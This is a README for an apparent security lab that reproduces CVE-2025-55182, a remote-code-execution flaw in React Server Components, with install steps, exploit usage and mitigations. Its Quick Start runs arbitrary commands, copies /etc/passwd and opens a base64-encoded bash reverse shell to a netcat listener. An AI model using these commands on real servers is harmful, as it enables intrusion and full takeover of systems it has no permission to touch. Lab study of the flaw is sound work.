React2Shell - CVE-2025-55182 Lab

A comprehensive laboratory for demonstrating and testing the critical vulnerability CVE-2025-55182 in React Server Components.

⚠️ Educational Purpose Only

This repository is intended for:

• Security research and education
• Understanding vulnerability mechanisms
• Testing on your own systems
• Bug bounty hunting preparation

Do not use against systems you don't own or have explicit permission to test. Unauthorized access is illegal.

🔴 Vulnerability Details

• CVE ID: CVE-2025-55182
• CVSS Score: 10.0 (Critical)
• Type: Unauthenticated Remote Code Execution (RCE)
• Affected Components:
  • React 19.0.0 - 19.2.0
  • Next.js 15.x - 16.x
• Root Cause: Unsafe deserialization in React Server Components "Flight" protocol

⚡ Capabilities

✅ Execute arbitrary commands without authentication
✅ Read system files
✅ Create and modify files
✅ Establish reverse shell connections
✅ Achieve full server control

🚀 Quick Start

1. Installation

npm install --legacy-peer-deps
npm run dev

Server will start at http://localhost:3000

2. Check Vulnerability

bash check-cve.sh

3. Running Exploits

cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. Reverse Shell

# Terminal 1 - Listener
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 Project Structure

├── app/              # Vulnerable Next.js application
├── exploit/          # Working PoC exploit
│   └── rce_final.py  # Main exploit script
├── check-cve.sh      # Automated vulnerability checker
├── package.json      # Vulnerable dependencies
└── README.md

🔧 Technical Details

The vulnerability exists in the deserialization logic of React Server Components payloads. The exploit leverages prototype pollution to execute arbitrary code via process.mainModule.require('child_process').execSync().

Attack Flow

1. Craft malicious multipart form data
2. Send to vulnerable React application
3. Exploit unsafe deserialization in "Flight" protocol
4. Achieve RCE on the server

📊 Impact

• Confidentiality: HIGH (read any file)
• Integrity: HIGH (modify/create files)
• Availability: HIGH (execute denial of service commands)

✅ Mitigation

1. Update React to 19.2.1 or later
2. Update Next.js to 15.0.5+ or 16.0.7+
3. Deploy Web Application Firewall (WAF) rules
4. Monitor server logs for exploitation attempts
5. Use runtime protection mechanisms

📚 References

• react2shell.com
• CVE-2025-55182 Details
• React Security Advisory
• CVSS Calculator

⚖️ Legal Disclaimer

This code is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. Unauthorized access to computer systems is illegal under laws such as the Computer Fraud and Abuse Act (CFAA) and similar legislation in other jurisdictions.

The author assumes no liability for misuse of this information.

🎓 Learning Outcomes

After working through this lab, you will understand:

• How unsafe deserialization vulnerabilities work
• Prototype pollution attack techniques
• React Server Components architecture
• RCE exploitation methods
• Proper vulnerability disclosure practices